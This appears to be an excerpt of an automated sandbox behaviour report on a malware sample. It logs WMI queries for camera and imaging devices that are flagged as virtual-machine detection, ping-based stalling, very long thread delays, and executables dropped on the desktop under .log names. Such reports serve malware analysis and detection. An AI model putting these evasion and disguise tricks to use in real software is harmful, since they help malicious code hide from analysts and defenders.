Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Memory allocated: 7D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Memory allocated: 1A4F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Memory allocated: 15B0000 memory reserve \| memory write watch
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Memory allocated: 1B250000 memory reserve \| memory write watch
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Memory allocated: 1330000 memory reserve \| memory write watch
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Memory allocated: 1B190000 memory reserve \| memory write watch
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Memory allocated: 1340000 memory reserve \| memory write watch
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Memory allocated: 1B090000 memory reserve \| memory write watch

Source: C:\Recovery\DtJTopEKFGnyRQt.exe

Code function: 32_2_00007FF848F67205 sldt word ptr [eax]

32_2_00007FF848F67205

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 600000
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 599871
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 597953
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 597360
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 3600000
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 596912
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 595188
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 594969
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 594766
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 594516
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 593688
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 593391
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 593008
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 592890
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 592781
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 592657
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 592360
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 592172
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 591625
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 591406
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 591276
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 591166
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 591047
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 590915
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 590797
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 590687
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 590577
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 590462
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 590325
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 590164
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 589969
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 589778
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 589672
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 589323
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 588063
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 587937
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 587828
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 587719
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 587609
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 587500
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 587390
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 587279
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 587172
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 587057
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 586938
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 586813
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 586688
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 586578
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 586469
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 586344
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 586235
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 586080
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 585940
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 585813
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 585687
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 585578
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9253	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 500	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9238	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 499	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8874
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 862
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7589
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2156
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9202
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 561
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Window / User API: threadDelayed 5411
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Window / User API: threadDelayed 4300

Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kWdCPgQJ.log	Jump to dropped file
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eyAdKmjt.log	Jump to dropped file
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gMOMTVsR.log	Jump to dropped file
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YmAdlBZw.log	Jump to dropped file
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gVlLDILN.log	Jump to dropped file
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RzAxqjrs.log	Jump to dropped file
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AGJJGYBl.log	Jump to dropped file
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oyuBnBbv.log	Jump to dropped file
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xcCqXurc.log	Jump to dropped file
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gRRDSLOb.log	Jump to dropped file

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe TID: 7604	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7312	Thread sleep count: 9253 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7340	Thread sleep count: 500 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5064	Thread sleep count: 9238 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5064	Thread sleep count: 499 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2464	Thread sleep count: 8874 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7416	Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4296	Thread sleep count: 862 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3332	Thread sleep count: 7589 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536	Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1568	Thread sleep count: 2156 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 320	Thread sleep count: 9202 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 320	Thread sleep count: 561 > 30
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6544	Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -600000s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -599871s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -597953s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -597360s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 1248	Thread sleep time: -18000000s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -596912s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -595188s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -594969s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -594766s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -594516s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -593688s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -593391s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -593008s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -592890s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -592781s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -592657s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -592360s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -592172s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -591625s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -591406s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -591276s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -591166s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -591047s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -590915s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -590797s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -590687s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -590577s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -590462s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -590325s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -590164s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -589969s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -589778s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -589672s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -589323s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -588063s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -587937s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -587828s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -587719s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -587609s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -587500s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -587390s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -587279s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -587172s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -587057s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -586938s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -586813s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -586688s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -586578s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -586469s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -586344s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -586235s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -586080s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -585940s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -585813s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -585687s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6772	Thread sleep time: -585578s >= -30000s
Source: C:\Recovery\DtJTopEKFGnyRQt.exe TID: 6528	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe TID: 7732	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6188	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007BA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_007BA69B
